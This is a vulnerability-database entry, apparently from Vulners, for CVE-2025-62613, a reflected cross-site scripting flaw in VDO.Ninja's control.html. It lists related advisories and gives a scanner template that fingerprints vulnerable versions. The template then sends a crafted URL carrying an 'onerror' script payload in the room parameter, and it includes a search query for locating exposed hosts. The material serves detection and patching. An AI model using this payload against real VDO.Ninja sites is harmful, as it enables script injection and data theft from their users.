| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2025-62613 | 25 Feb 202604:42 | – | circl | |
| vdo.ninja 跨站脚本漏洞 | 22 Oct 202500:00 | – | cnnvd | |
| CVE-2025-62613 | 22 Oct 202520:52 | – | cve | |
| CVE-2025-62613 VDO.Ninja Reflected XSS Vulnerability in control.html | 22 Oct 202520:52 | – | cvelist | |
| EUVD-2025-35631 | 22 Oct 202520:52 | – | euvd | |
| CVE-2025-62613 | 22 Oct 202521:15 | – | nvd | |
| CVE-2025-62613 VDO.Ninja Reflected XSS Vulnerability in control.html | 22 Oct 202520:52 | – | osv | |
| PT-2025-43408 | 22 Oct 202500:00 | – | ptsecurity | |
| CVE-2025-62613 | 23 Oct 202521:09 | – | redhatcve | |
| CVE-2025-62613 VDO.Ninja Reflected XSS Vulnerability in control.html | 22 Oct 202520:52 | – | vulnrichment |
id: CVE-2025-62613
info:
name: VDO.Ninja - DOM-Based Cross-Site Scripting
author: 0x_Akoko
severity: medium
description: |
VDO.Ninja 28.0 to 28.3 contains a reflected XSS caused by improper sanitization of the room parameter in examples/control.html, letting remote attackers execute scripts, exploit requires crafted URL.
impact: |
Attackers can execute arbitrary scripts in users' browsers, potentially stealing data or performing actions on their behalf.
remediation: |
Update to version 28.4 or later.
reference:
- https://github.com/steveseguin/vdo.ninja/security/advisories/GHSA-mp9c-cpch-x73c
- https://github.com/steveseguin/vdo.ninja/commit/83c0ac753ad60c7a086daced3244688cabd4f6b8
- https://nvd.nist.gov/vuln/detail/CVE-2025-62613
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-62613
cwe-id: CWE-79
epss-score: 0.01099
epss-percentile: 0.61672
metadata:
verified: true
max-request: 2
fofa-query: body="vdo.ninja"
tags: cve,cve2025,xss,vdo-ninja
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/index.html"
matchers:
- type: dsl
internal: true
dsl:
- "status_code == 200"
- 'contains_any(body, "www.vdo.ninja", "VDO.Ninja")'
- 'contains(body, "session.version") && contains_any(body, "28.0", "28.1", "28.2", "28.3")'
condition: and
- method: GET
path:
- "{{BaseURL}}/examples/control.html?room=%3Cimg%20src=x%20onerror=alert(document.domain)%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, ".innerHTML", "roomID", "generateStreamID")'
- '!contains(body, "encodeURIComponent")'
condition: and
# digest: 490a0046304402206fd3ecaafd0a7e4c3e93134dd1d90ab2f13a9bf3106ca41f9444e780acb8106102207e9b63a0068bffd3f392b9c3839785638cf222683f0cf2b1c269b1d89440322b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation